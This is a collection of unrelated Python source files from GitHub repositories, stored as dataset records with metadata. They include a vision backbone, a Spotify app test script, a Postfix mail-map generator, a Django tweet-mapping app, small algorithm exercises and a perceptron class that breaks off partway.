>>> inputs = torch.rand(1, 3, 32, 32)\n >>> level_outputs = self.forward(inputs)\n >>> for level_out in level_outputs:\n ... 
print(tuple(level_out.shape))\n        (1, 64, 8, 8)\n        (1, 128, 4, 4)\n        (1, 256, 2, 2)\n        (1, 512, 1, 1)\n    \"\"\"\n\n    def __init__(self,\n                 depth,\n                 out_indices=(0, 1, 2, 3),\n                 frozen_stages=-1,\n                 norm_eval=True):\n        super().__init__()\n\n        self.depth = depth\n        self.out_indices = out_indices\n        self.frozen_stages = frozen_stages\n        self.norm_eval = norm_eval\n\n\n        model = getattr(pretrainedmodels, 'se_resnext{}_32x4d'.format(depth))(pretrained=None)\n        self.layer0 = model.layer0\n        self.layer1 = model.layer1\n        self.layer2 = model.layer2\n        self.layer3 = model.layer3\n        self.layer4 = model.layer4\n\n        self.res_layers = ['layer{}'.format(i) for i in range(1, 5)]\n\n        self._freeze_stages()\n\n\n    def _freeze_stages(self):\n        for i in range(0, self.frozen_stages + 1):\n            m = getattr(self, 'layer{}'.format(i))\n            m.eval()\n            for param in m.parameters():\n                param.requires_grad = False\n\n    def init_weights(self, pretrained):\n        if pretrained is None:\n            return\n        print('Loading <{}> pretrained weights ...'.format(pretrained))\n        model = getattr(pretrainedmodels, 'se_resnext{}_32x4d'.format(self.depth))(pretrained=pretrained)\n        for layer_name in ['layer0'] + self.res_layers:\n            layer_dict = getattr(model, layer_name).state_dict()\n            getattr(self, layer_name).load_state_dict(layer_dict)\n\n    def forward(self, x):\n        x = self.layer0(x)\n        outs = []\n        for i, layer_name in enumerate(self.res_layers):\n            res_layer = getattr(self, layer_name)\n            x = res_layer(x)\n            if i in self.out_indices:\n                outs.append(x)\n        return tuple(outs)\n\n    def train(self, mode=True):\n        super().train(mode)\n        self._freeze_stages()\n        if mode and self.norm_eval:\n            for m in self.modules():\n                # trick: eval() only has an effect on BatchNorm layers\n                if isinstance(m, _BatchNorm):\n                    m.eval()\n","repo_name":"yihhan/3dcnn_code","sub_path":"deepfake/deepfake/mmdetection/mmdet/models/backbones/se_resnext.py","file_name":"se_resnext.py","file_ext":"py","file_size_in_byte":3902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"7021030098","text":"# external\n# python native\nimport time\nimport logging\nimport json\nimport sys\nimport winsound\nimport traceback\n# project\nfrom Gustelfy import database\nfrom Gustelfy.objects import album, artist, playlist, track, user\nfrom Gustelfy.util import config\nfrom Gustelfy import session, spotify_api\n\ndef test():\n    try:\n        # sys.argv[2] is inspected below, so at least 3 arguments are required\n        if len(sys.argv) >= 3:\n            if sys.argv[2] == \"api\":\n                api()\n            elif sys.argv[2] == \"merge\":\n                merge()\n            elif sys.argv[2] == \"db\":\n                db_connection()\n            elif sys.argv[2] == \"dbp\":\n                dbp()\n            elif sys.argv[2] == \"obj\":\n                objects()\n            elif sys.argv[2] == \"update\":\n                db_update()\n            else:\n                print(\"Select test to run.\")\n        else:\n            print(\"Select test to run.\")\n    except Exception as e:\n        print(e)\n        traceback.print_exc()\n        amogus()\n        exit()\n    winsound.Beep(523, 300) # C5\n    winsound.Beep(523, 150) # C5\n    winsound.Beep(659, 600) # E5\n\ndef db_update():\n    \"\"\"Testing update of incomplete entries\n    \"\"\"\n    logger = logging.getLogger(\"Gustelfy\")\n    logger.setLevel(10)\n    logger.debug(\"amogus\")\n    session = prepare()\n\n    #session.db_con.add_album(session.spotify.fetch_album(\"66Oi1725EJCwCh3NqWcRuL\"))\n\n    session.update_database()\n\ndef dbp():\n    \"\"\"Testrun without flask\"\"\"\n    logger = logging.getLogger(\"Gustelfy\")\n    logger.setLevel(10)\n    # Initialise config object\n    settings = config.Config()\n    # Connect to database and fix table\n    db = database.Database(\"oracledb\").get_db_connection()\n    usr = user.User(\"testmanfred\")\n    # Connect to spotify\n    spotify = spotify_api.Spotify_api()\n    user_session = 
session.Session(usr, spotify, db)\n\n # Test database fillup\n user_session.dbp_fill_db()\n\n # test of fetch_favorites album bug\n \"\"\"\n testdata = user_session.spotify.fetch_favorites()\n json_data = user_session.spotify.fetch_favorites(json=True)\n\n i = 0\n for fav in testdata:\n print(fav.get_album())\n i += 1 \n if i > 10:\n break\n\n if isinstance(json_data, dict):\n with open('test.json', 'w') as amogus:\n json.dump(json_data,amogus,indent=3)\n print(\"result written to test.json\")\n return\n \"\"\"\ndef objects():\n \"\"\"testing different objects\"\"\"\n user_session = prepare()\n\n #\n test_artist = artist.Artist(\n id = \"11111_test\",\n name = \"11111_test\",\n genres = [\"test_genre1\",\"test_genre2\"],\n images = [{\"height\":64,\"url\":\"https://www.scdn.co/i/_global/favicon.png\",\"width\":64}],\n popularity = 69,\n followers = 420\n )\n\n test_track = track.Track(\n id = \"11111_test\",\n name = \"TEST_TRACK\",\n artists = [test_artist],\n duration_ms = 123456,\n album_id = \"11111_test\",\n disc_number = 1,\n track_number = 1,\n explicit = True,\n popularity = 34\n )\n \n test_album = album.Album(\n id = \"11111_test\",\n name = \"TEST_ALBUM\",\n artists = [test_artist],\n tracks = [test_track],\n images = [{\"height\":64,\"url\":\"https://www.scdn.co/i/_global/favicon.png\",\"width\":64}],\n release_date = \"2021-01-01\",\n total_tracks = 1,\n popularity = 69\n )\n #print(test_album)\n #user_session.db_con.add_album(test_album)\n #user_session.db_con.add_artist(test_artist)\n user_session.db_con.add_track(test_track)\n return\n\ndef api():\n logger = logging.getLogger(\"Gustelfy\")\n logger.setLevel(10)\n settings = config.Config()\n spotify = spotify_api.Spotify_api()\n result = {}\n \n # Turbo thomas: 2vWnOXI1ALzlvNTdjVPMG1\n # Rap über hass: 21ownMQ51Jqlv8si9CTI6R\n #result = spotify.fetch_track('21ownMQ51Jqlv8si9CTI6R',json=True)\n #result = spotify.fetch_album(\"1kTlYbs28MXw7hwO0NLYif\",json=True)\n result = spotify.fetch_artist(\"1ehBmvzykgp3Il0BUIZdev\",json=True)\n result_o = spotify.fetch_artist(\"1ehBmvzykgp3Il0BUIZdev\")\n #result = spotify.fetch_playlist(\"349T3IRkkkTyBc1SqyP1JH\",json=True)\n #result = spotify.fetch_playlist(\"5JfpaSo0hvoRdGRYFrEP3x\",json=True) # wtf?\n #result = spotify.amogus(\"5JfpaSo0hvoRdGRYFrEP3x\")\n #result = spotify.fetch_favorites(json=True)\n #result = spotify.fetch_playlists(json=True)\n #result = spotify.fetch_user(json=True)\n #result = spotify.fetch_playlist_tracks(\"349T3IRkkkTyBc1SqyP1JH\",json=True)\n print(result_o.get_followers())\n with open('test.json', 'w') as amogus:\n json.dump(result,amogus,indent=3)\n print(\"result written to test.json\")\n #result = spotify.fetch_playlist(\"349T3IRkkkTyBc1SqyP1JH\")\n #print(result.get_tracks())\n\ndef merge():\n \"\"\"Testing the merge function for different spotify objects\n \"\"\"\n old = track.Track(\n id=\"amogus123\",\n artists=[],\n name=\"Amogus Party\",\n timestamp=1,\n duration_ms=12343,\n explicit=False,\n popularity=20,\n track_number=12\n )\n new = track.Track(\n id=\"amogus123\",\n artists=[artist.Artist(id=\"mogusmann\",name=\"kekw\")],\n name=\"Amogus Party\",\n timestamp=3,\n duration_ms=123,\n explicit=True,\n popularity=20\n )\n new.merge(old)\n mogus = new\n print(\n f\"{mogus.get_id()} {mogus.get_artists()} {mogus.get_name()} {mogus.get_timestamp()} {mogus.get_duration_ms()} {mogus.is_expired()} {mogus.get_popularity()} {mogus.get_track_number()}\"\n )\n\ndef amogus():\n \"\"\"sus\n \"\"\"\n winsound.Beep(523, 300) # C5\n winsound.Beep(622, 300) # E5 
flat\n    winsound.Beep(698, 300) # F5\n    winsound.Beep(740, 300) # G5 flat\n    winsound.Beep(698, 300) # F5\n    winsound.Beep(622, 300) # E5 flat\n    winsound.Beep(523, 300) # C5\n    time.sleep(0.6)\n    winsound.Beep(466, 150) # B4 flat\n    winsound.Beep(587, 150) # D5\n    winsound.Beep(523, 300) # C5\n\ndef prepare() -> session.Session:\n    logger = logging.getLogger(\"Gustelfy\")\n    logger.setLevel(10)\n    # Initialise config object\n    config.Config()\n    # Connect to database and fix table\n    db = database.Database(\"oracledb\").get_db_connection()\n    usr = user.User(\"testmanfred\")\n    # Connect to spotify\n    spotify = spotify_api.Spotify_api()\n    return session.Session(usr, spotify, db)\n\n\ndef db_connection():\n    \"python -m Gustelfy db\"\n    db = database.Database(\"oracledb\").get_db_connection()\n    db.connect_database()\n\n    test_artist = artist.Artist(\n        id=\"42069\",\n        name=\"Arschbach Poposohn\",\n        genres=[\"wurst and roll\",\"rap\"]\n    )\n    test_artist.set_image_url(\"https://google.com/image/amogus.png\")\n\n    #result = db.get_artist(\"42069\")\n    #print(result.get_genres())\n    print(db.add_artist(test_artist))\n\n    #db.add_artist(test_artist)","repo_name":"krippix/GustelfyPlaylists","sub_path":"Gustelfy/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"4195158041","text":"import itertools\n\nprimes = [2]\ncount = 1\nn = 3\nwhile count < 10001:\n    m = n ** 0.5 + 1\n    if all(n % x != 0 for x in itertools.takewhile(lambda i: i < m, primes)):\n        primes.append(n)\n        count += 1\n    n += 2\nprint(primes[-1])","repo_name":"ducngtuan/euler","sub_path":"1-50/problem7/problem7.py","file_name":"problem7.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"39001000859","text":"# Implement the RLE algorithm: implement data compression and decompression modules.\n# The input and output data are stored in separate text files.\n\n# read the input from a file\nwith open('file1.txt', 'r') as data:\n    st = data.readline()\n\nprint(' Line from file file1.txt')\nprint(st)\n\n\n# compress the data\nls = []\nn = len(st)\nj = 1\ni = 0\nwhile i < (n-1):\n    if st[i] == st[i+1]:\n        j = j + 1\n        h = str(j)\n        i = i + 1\n    else:\n        h = str(j)\n        a = h + st[i]\n        i = i + 1\n        j = 1\n        ls.append(a)\nb = str(j)\na1 = b + st[-1]\nls.append(a1)\nstro = ''.join(ls)\nprint(stro)\n\nwith open('file2.txt', 'w') as f: f.write(stro) # write the compressed data to a file\n\n# decompress the data\n# accumulate every digit of a run length so counts of 10 or more are decoded correctly\nnum = ''\nnov_str = []\nfor ch in stro:\n    if ch.isdigit():\n        num = num + ch\n    else:\n        nov_str.append(ch * int(num))\n        num = ''\nnov_str1 = ''.join(nov_str)\nprint(nov_str1)\n","repo_name":"Olga-Chichikina/PytonZad","sub_path":"DZ5/zad5_4.py","file_name":"zad5_4.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40115693819","text":"import logging\n\nimport protobufs.messages.daan_pb2 as daan_pb2\nfrom tarjan.tc import tc\n\nfrom django.conf import settings\nfrom django.utils import six\n\nimport kn.leden.entities as Es\nfrom kn.leden.date import now\n\n# TODO (issue #7) handle cycles properly.\n\n\ndef generate_postfix_map():\n    tbl = daan_pb2.PostfixMap()  # the virtual map\n    non_mailman_groups = {}\n    dt_now = now()\n    id2email = {}\n    # handle the straightforward cases\n    for e in Es.all():\n        if e.canonical_email is None:\n            continue\n        id2email[e._id] = 
e.canonical_email\n for nm in e.other_names:\n tbl.map[\"%s@%s\" % (nm, settings.MAILDOMAIN)].values.append(e.canonical_email)\n if e.type == 'user':\n tbl.map[e.canonical_email].values.append(e.email)\n elif e.type == 'group':\n if e.got_mailman_list and e.name:\n tbl.map[e.canonical_email].values.append('%s@%s' % (\n str(e.name), settings.LISTS_MAILDOMAIN))\n else:\n non_mailman_groups[e._id] = e\n else:\n logging.warn(\"postfix: unhandled type: %s\" % e.type)\n id_email = \"%s@%s\" % (e.id, settings.MAILDOMAIN)\n if id_email not in tbl.map:\n tbl.map[id_email].values.append(e.canonical_email)\n # handle the non-mailman groups\n for rel in Es.query_relations(_with=list(non_mailman_groups),\n _from=dt_now, until=dt_now, how=None):\n e = non_mailman_groups[rel['with']]\n email = id2email.get(rel['who'])\n if email is not None:\n tbl.map[e.canonical_email].values.append(email)\n return tbl\n\n\ndef generate_postfix_slm_map():\n # We generate the postfix \"sender_login_maps\".\n # This is used to decide by postfix whether a given user is allowed to\n # send e-mail as if it was coming from a particular e-mail address.\n # It is a dictionary { : [ , ... ] }\n tbl = dict()\n dt_now = now()\n # Get all users\n ulut = dict()\n # We only allow members to send e-mail\n for u in Es.by_name('leden').get_members():\n ulut[u._id] = u\n for name in u.names:\n if str(name) not in tbl:\n tbl[str(name)] = set()\n tbl[str(name)].add(str(u.name))\n # There are two kind of groups: groups whose members are allowed to\n # send e-mail as if coming from the group itself and those where this\n # is not allowed. For convenience, lets call the first kind the\n # impersonatable groups.\n # Get all impersonatable groups and create a look-up-table for\n # group membership\n gs = list()\n for g in Es.groups():\n # TODO add a tag to force a group either impersonatable or not\n if not g.got_mailman_list:\n gs.append(g)\n mrels = Es.query_relations(how=None, _with=gs, _from=dt_now, until=dt_now)\n mlut = dict()\n for g in gs:\n mlut[g._id] = []\n for mrel in mrels:\n mlut[mrel['with']].append(mrel['who'])\n # Flatten out group membership. 
For instance: if Giedo is in Kasco\n # and Kasco is in Boekenlezers, then Giedo is also in the Boekenlezers\n # unix group.\n # But first split the mlut graph into a impersonatable group\n # and a non-group subgraph.\n mlut_g = {} # { : }\n mlut_u = {} # { : }\n for g_id in mlut:\n mlut_g[g_id] = [c for c in mlut[g_id] if c in mlut]\n mlut_u[g_id] = [c for c in mlut[g_id] if c in ulut]\n mlut_g_tc = tc(mlut_g) # transitive closure\n for g in gs:\n to_consider = tuple(mlut_g_tc[g._id]) + (g._id,)\n for sg_id in to_consider:\n for u_id in mlut_u[sg_id]:\n for name in g.names:\n if str(name) not in tbl:\n tbl[str(name)] = set()\n tbl[str(name)].add(str(ulut[u_id].name))\n # Clean up tbl to return.\n ret = daan_pb2.PostfixMap()\n for name, users in six.iteritems(tbl):\n if not users:\n continue\n ret.map[\"%s@%s\" % (name, settings.MAILDOMAIN)].values.extend(users)\n return ret\n\n# vim: et:sta:bs=2:sw=4:\n","repo_name":"karpenoktem/kninfra","sub_path":"kn/utils/giedo/postfix.py","file_name":"postfix.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"30574796433","text":"import math\n\nx1, y1 = input().split(\" \")\nx2, y2 = input().split(\" \")\nx1 = float(x1)\nx2 = float(x2)\ny1 = float(y1)\ny2 = float(y2)\n\nd = (x2 - x1)**2 + (y2 - y1)**2\n\nprint(\"{:.4f}\".format(math.sqrt(d))) ","repo_name":"develis/uri-python","sub_path":"1015 - Distância Entre Dois Pontos.py","file_name":"1015 - Distância Entre Dois Pontos.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4336651528","text":"import pandas as pd\nimport csv\nimport ast\nimport collections\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nimport matplotlib.pyplot as plt\nfrom collections import Counter\n\n\ndf = pd.read_csv('Search.csv')\n\ndef commonWordsList(column):\n \"\"\"\n Given a column, this method turns it into a list and then flattens the list\\\n of lists (since the entries are also lists), and then returns the top 4\\\n most common entries (with the number of instances) as a tuple.\n\n Parameter column: Column of a DataFrame to be analyzed\n Precondition: column of a DataFrame\n Example: \"Keywords\"\n \"\"\"\n l = df[column].tolist()\n list = [inner for item in l for inner in ast.literal_eval(item)] #flatten the list\n counter = collections.Counter(list)\n return(counter.most_common()[:4])\n\ndef commonWords(column, c2 = [], c3 = []):\n \"\"\"\n Given a column(s) (that is practically a 1D list without any nested lists),\\\n this method turns it into a list, and then returns the top 4 most common \\\n entries. 
If more than 1 column is provided, it turns all given \\\n    columns into lists, joins them to create a single bigger list, and then \\\n    returns the top 4 most common entries (with the number of instances) as a \\\n    tuple\n\n    Parameter column: Column of a DataFrame to be analyzed\n    Parameter c2: Column of a DataFrame to be analyzed\n    Parameter c3: Column of a DataFrame to be analyzed\n    Precondition (for all parameters): column of a DataFrame\n    Example: \"Director, Lead_Actor\"\n    \"\"\"\n    l1 = df[column].tolist()\n    l = l1\n    if (c2 != [] and c3 != []):\n        l2 = df[c2].tolist()\n        l3 = df[c3].tolist()\n        l = l1 + l2 + l3\n    counter = collections.Counter(l)\n    return(counter.most_common()[:4])\n\ndef makePlot(column):\n    # group by the requested column instead of a hard-coded one\n    d = df.groupby(column)\n    plt.figure(figsize=(12,8))\n    d.size().sort_values(ascending=False).plot.bar()\n    plt.xticks(rotation=50)\n    plt.xlabel(column)\n    plt.ylabel(\"Number of Liked Movies\")\n    plt.savefig(\"myPlot\"+\".png\", bbox_inches='tight')\n    plt.show()\n    plt.close()\n\ndef makeWordCloud(column):\n    values = df[column].tolist()\n    my_list = [inner for item in values for inner in ast.literal_eval(item)]\n    word_cloud_dict = Counter(my_list)\n    wordcloud = WordCloud(width = 1000, height = 500).generate_from_frequencies(word_cloud_dict)\n\n    plt.figure(figsize=(15,8))\n    plt.imshow(wordcloud)\n    plt.axis(\"off\")\n    plt.savefig(\"myWordCloud\"+\".png\", bbox_inches='tight')\n    plt.show()\n    plt.close()\n\nmeanBudget = df[\"Budget\"].mean()\nmeanDuration = df[\"Duration\"].mean()\nmeanRating = df[\"IMDb_Rating\"].mean()\nmeanRevenue = df[\"Revenue\"].mean()\ntopGenres = commonWordsList(\"Genres\")\ntopKeywords = commonWordsList(\"Keywords\")\ntopDirectors = commonWords(\"Director\")\ntopActors = commonWords(\"Lead_Actor\", \"Supporting_Actor_1\", \"Supporting_Actor_2\")\nmakeWordCloud(\"Keywords\")\nmakePlot(\"Genres\")\n","repo_name":"keethu-ram/Movie-Analysis","sub_path":"analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"10844614264","text":"import sys\ninput = sys.stdin.readline\nn, m = map(int, input().rstrip().split())\ndatas = list(map(int, input().rstrip().split()))\ndatas.sort()\ndef backtracking(start, to, l, nums, m):\n    if len(l) == m:\n        print(*l)\n        return\n    for i in range(start, to):\n        l.append(nums[i])\n        backtracking(i, to, l, nums, m)\n        l.pop()\nbacktracking(0, n, [], datas, m)","repo_name":"K1A2/algorithm_python","sub_path":"baekjoon/backtracking/15657_N과M_8.py","file_name":"15657_N과M_8.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"71455298612","text":"# CHAPTER FOUR TRY IT YOURSELF\n\n# 4-6 Odd Numbers\n# Use the third argument of the range() function to make a list of\n# the odd numbers from 1 to 20. Use a 'for' loop to print each\n# number.\n\noddnumbers = list(range(1, 21, 2))\n\nfor oddnumber in oddnumbers:\n\tprint(oddnumber)\n\n# Can you do a list comprehension there?\n\n","repo_name":"ctrlshftejct/pythoncc","sub_path":"2019/chapter4/tiy_oddnumbers.py","file_name":"tiy_oddnumbers.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6402574390","text":"#!/usr/bin/python3\n\n# Deletes all of the Transplanting logs and possibly the Planting assets.\n\n# Most transplantings rely on existing Plantings from traySeedings.\n# By default those Plantings are not deleted.\n# This allows the addTransplantings.py script to be run again.\n# However, plantings created for directly transplanted crops that arrived in trays\n# will be deleted by default, because they are recreated by the addTransplantings.py script.\n\n# Adding the command line argument \"all\" will cause this script to also\n# delete the preexisting Planting assets from the traySeedings.\n\nfrom utils import *\n\ndef main():\n\n    print(\"Deleting Transplantings...\")\n\n    delAllPlantings = False\n    if (len(sys.argv) == 2 and sys.argv[1] == 'all'):\n        print(\"  Deleting all Plantings\")\n        delAllPlantings = True\n\n    # Delete any transplantings that exist.\n    deleteAllLogs('http://localhost/log.json?type=farm_transplanting')\n\n    # Delete all of the Plantings created specifically for transplantings\n    deleteAllAssets('http://localhost/farm_asset.json?type=planting&name[sw]=0000-00-00')\n\n    if delAllPlantings:\n        deleteAllAssets('http://localhost/farm_asset.json?type=planting')\n\n    # Delete the transplanting category that was added.\n    deleteSeedingCategory(\"Transplantings\")\n\n    print(\"Transplantings deleted.\")\n\nif __name__ == \"__main__\":\n    main()","repo_name":"cmacdonell/GitKit-FarmData2","sub_path":"docker/sampleDB/deleteTransplantings.py","file_name":"deleteTransplantings.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"41239508077","text":"from django.conf import settings\nfrom django.http import JsonResponse\nfrom django.shortcuts import render\nfrom elasticsearch import Elasticsearch, RequestsHttpConnection\nfrom multiprocessing import Process\nfrom requests_aws4auth import AWS4Auth\nimport json\nimport math\nimport tweepy\n\nconsumer_key = ''\nconsumer_secret = ''\naccess_token = ''\naccess_token_secret = ''\n\naws_access_key_id = ''\naws_secret_access_key = ''\nregion = 'us-east-2'\n\nhost = ''\nawsauth = AWS4Auth(aws_access_key_id, aws_secret_access_key, region, 'es')\n\nes = Elasticsearch(\n\thosts=[{'host': host, 'port': 443}],\n\thttp_auth=awsauth,\n\tuse_ssl=True,\n\tverify_certs=True,\n\tconnection_class=RequestsHttpConnection\n)\n\ntweets = []\ntrends = []\n\nclass StreamListener(tweepy.StreamListener):\n\t\n\tdef __init__(self, api):\n\t\tself.api = api\n\t\tsuper(tweepy.StreamListener, self).__init__()\n\t\tself.count = settings.COUNT\n\n\tdef on_data(self, tweet):\n\t\t# while True:\n\t\twhile self.count<=1000:\n\t\t\tres = es.index(index=\"tweet-index\", doc_type='tweet', id=self.count, body=tweet)\n\t\t\tself.count+=1\n\t\t\treturn True\n\n\tdef on_error(self, status_code):\n\t\tprint(\"status_code = \",status_code)\n\t\tif status_code == 420:\n\t\t\treturn False\n\ndef ajax_process(request):\n\tif settings.COUNT<=100000:\n\t\tfor i in range(settings.COUNT, settings.COUNT+100):\n\t\t\tres = 
es.get(index=\"tweet-index\", doc_type='tweet', id=i)\n\t\t\ttweets.append(res['_source'])\n\t\tsettings.COUNT+=100\n\t\t\n\t\tlanguages = []\n\t\tlatitude = []\n\t\tlongitude = []\n\t\ttweet_id = []\n\t\ttweet_text = []\n\t\tuser_profile_image_url = []\n\t\tuser_screen_name = []\n\t\t\n\t\tlanguages, latitude, longitude, tweet_id, tweet_text, user_profile_image_url, user_screen_name = process_tweets(tweets)\n\t\t\n\t\treturn JsonResponse({\"tweet_data\" : tweets, \"latitude\": latitude, \"longitude\": longitude, \"languages\": languages,\n\t\t\t\"user_profile_image_url\": user_profile_image_url, \"user_screen_name\": user_screen_name, \"tweet_id\": tweet_id, \"tweet_text\": tweet_text})\n\telse:\n\t\treturn JsonResponse({})\n\ndef index(request):\n\tif settings.FLAG==0:\n\t\tsettings.FLAG = 1\n\t\tp1 = Process(target = twitter_stream)\n\t\tp1.start()\t\n\treturn render(request, 'TweetMap/index.html', {})\n\ndef process_tweets(tweet_list):\n\tlanguages = []\n\tlatitude = []\n\tlongitude = []\n\ttweet_id = []\n\ttweet_text = []\n\tuser_profile_image_url = []\n\tuser_screen_name = []\n\t\n\tlanguages = list(map(lambda tweet: tweet['lang'] if 'lang' in tweet\n\t\t\t\t\t\tand tweet['lang'] != None else 'NaN', tweet_list))\n\n\ttweet_id = list(map(lambda tweet: tweet['id'] if 'id' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\t\n\ttweet_text = list(map(lambda tweet: tweet['text'] if 'text' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\n\tuser_profile_image_url = list(map(lambda tweet: tweet['user']['profile_image_url_https'] if 'user' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\t\n\tuser_screen_name = list(map(lambda tweet: tweet['user']['screen_name'] if 'user' in tweet\n\t\t\t\t\t\telse 'NaN', tweet_list))\n\t\n\tlatitude = list(map(lambda tweet: tweet['coordinates']['coordinates'][1]\n\t\t\t\t\t\tif 'coordinates' in tweet and tweet['coordinates'] != None\n\t\t\t\t\t\telse float(float(tweet['place']['bounding_box']['coordinates'][0][1][1]\n\t\t\t\t\t\t\t\t\t+ tweet['place']['bounding_box']['coordinates'][0][3][1])/2)\n\t\t\t\t\t\tif 'place' in tweet and tweet['place']!=None \n\t\t\t\t\t\telse 'NaN', tweet_list))\n\n\tlongitude = list(map(lambda tweet: tweet['coordinates']['coordinates'][0]\n\t\t\t\t\t\tif 'coordinates' in tweet and tweet['coordinates'] != None \n\t\t\t\t\t\telse float(float(tweet['place']['bounding_box']['coordinates'][0][1][0]\n\t\t\t\t\t\t\t\t\t+ tweet['place']['bounding_box']['coordinates'][0][3][0])/2)\n\t\t\t\t\t\tif 'place' in tweet and tweet['place']!=None else 'NaN', tweet_list))\n\n\tlongitude = list(map(float, longitude))\n\tlongitude = [999 if math.isnan(i) else i for i in longitude]\n\tlatitude = list(map(float, latitude))\n\tlatitude = [999 if math.isnan(i) else i for i in latitude]\n\n\treturn languages, latitude, longitude, tweet_id, tweet_text, user_profile_image_url, user_screen_name\n\ndef search_query(request):\n\tsearch_results = []\n\tif request.method == \"POST\":\n\t\tsearch_term = request.POST.get('search_bar')\n\t\tdropdown_option = 0\n\t\tis_dropdown_search = request.POST.get('is_dropdown_search')\n\t\tdropdown_dict = {'cat':1,'dog':2,'cricket':3,'football':4,'modi':5,'trump':6,'song':7,'vacation':8,'offer':9,'sale':10}\n\t\t\n\t\tif is_dropdown_search==\"1\":\n\t\t\tdropdown_option = dropdown_dict.get(search_term)\n\t\t\n\t\tquery = json.dumps({\n\t\t\t\"query\": {\n\t\t\t\t\"match\": {\n\t\t\t\t\t\"text\": search_term\n\t\t\t\t}\n\t\t\t}\n\t\t})\n\t\tres = es.search(index=\"tweet-index\", body=query)\n\t\tfor hit in 
res['hits']['hits']:\n\t\t\tsearch_results.append(hit[\"_source\"])\n\t\t\n\t\tlanguages = []\n\t\tlatitude = []\n\t\tlongitude = []\n\t\ttweet_id = []\n\t\ttweet_text = []\n\t\tuser_profile_image_url = []\n\t\tuser_screen_name = []\n\n\t\tif len(search_results)>0:\n\t\t\tlanguages, latitude, longitude, tweet_id, tweet_text, user_profile_image_url, user_screen_name = process_tweets(search_results)\n\n\treturn render(request, 'TweetMap/results.html',\n\t\t{'latitude': latitude, 'longitude': longitude,'languages': languages, 'dropdown_option':dropdown_option,\n\t\t'user_profile_image_url': user_profile_image_url, 'user_screen_name': user_screen_name, 'tweet_id': tweet_id, 'tweet_text': tweet_text})\n\ndef twitter_stream():\n\tauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n\tauth.set_access_token(access_token, access_token_secret)\n\tapi = tweepy.API(auth)\n\ttrends = api.trends_place(1)\n\t# for location in trends:\n\t# \tfor trend in location[\"trends\"]:\n\t\t\t# trends.append(trend[\"name\"])\n\t\t\t# print(trend[\"name\"])\n\tstream_listener = StreamListener(api)\n\tstream = tweepy.Stream(auth=api.auth, listener=stream_listener)\n\tstream.filter(locations=[-180,-90,180,90])\n","repo_name":"tronak19/TweetMap","sub_path":"ebdjango/TweetMap/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13588344402","text":"import sys\nimport os\n\nsys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\"))\nimport pytest\nfrom itertools import product\n\nimport torch\nfrom lib.modules.classification.classification.multiple_instance_learning import (\n MultipleInstanceClassifier,\n get_adn_fn,\n)\n\nbatch_size = 4\ninput_dim = 1\ninput_dim_mil = 32\nclassification_structure = [32, 16]\nfeat_extraction_structure = [32, 16]\nn_slices = 8\nn_classes = 2\nadn_fn = get_adn_fn(1, \"identity\", \"gelu\", 0.1)\n\n\n@pytest.mark.parametrize(\n \"classification_mode,attention\",\n product([\"mean\", \"max\", \"vocabulary\"], [True, False]),\n)\ndef test_mil(classification_mode, attention):\n mod = MultipleInstanceClassifier(\n module=torch.nn.Conv2d(input_dim, input_dim_mil, 3),\n module_out_dim=input_dim_mil,\n n_classes=n_classes,\n feat_extraction_structure=feat_extraction_structure,\n classification_structure=classification_structure,\n classification_mode=classification_mode,\n classification_adn_fn=adn_fn,\n n_slices=n_slices,\n use_positional_embedding=False,\n attention=attention,\n dim=2,\n )\n input_tensor = torch.rand(batch_size, input_dim, 32, 32, n_slices)\n output = mod(input_tensor)\n assert list(output.shape) == [\n batch_size,\n 1 if n_classes == 2 else n_classes,\n ]\n","repo_name":"CCIG-Champalimaud/adell-mri","sub_path":"testing/test_mil.py","file_name":"test_mil.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"11362554925","text":"import numpy as np\n\n\nclass Perceptron:\n def __init__(self, n_class: int, lr: float, epochs: int):\n \"\"\"Initialize a new classifier.\n\n Parameters:\n n_class: the number of classes\n lr: the learning rate\n epochs: the number of epochs to train for\n \"\"\"\n self.w = None\n self.lr = lr\n self.epochs = epochs\n self.n_class = n_class\n\n def train(self, X_train: np.ndarray, y_train: np.ndarray):\n \"\"\"Train the classifier.\n\n Use the perceptron update rule as introduced in the 
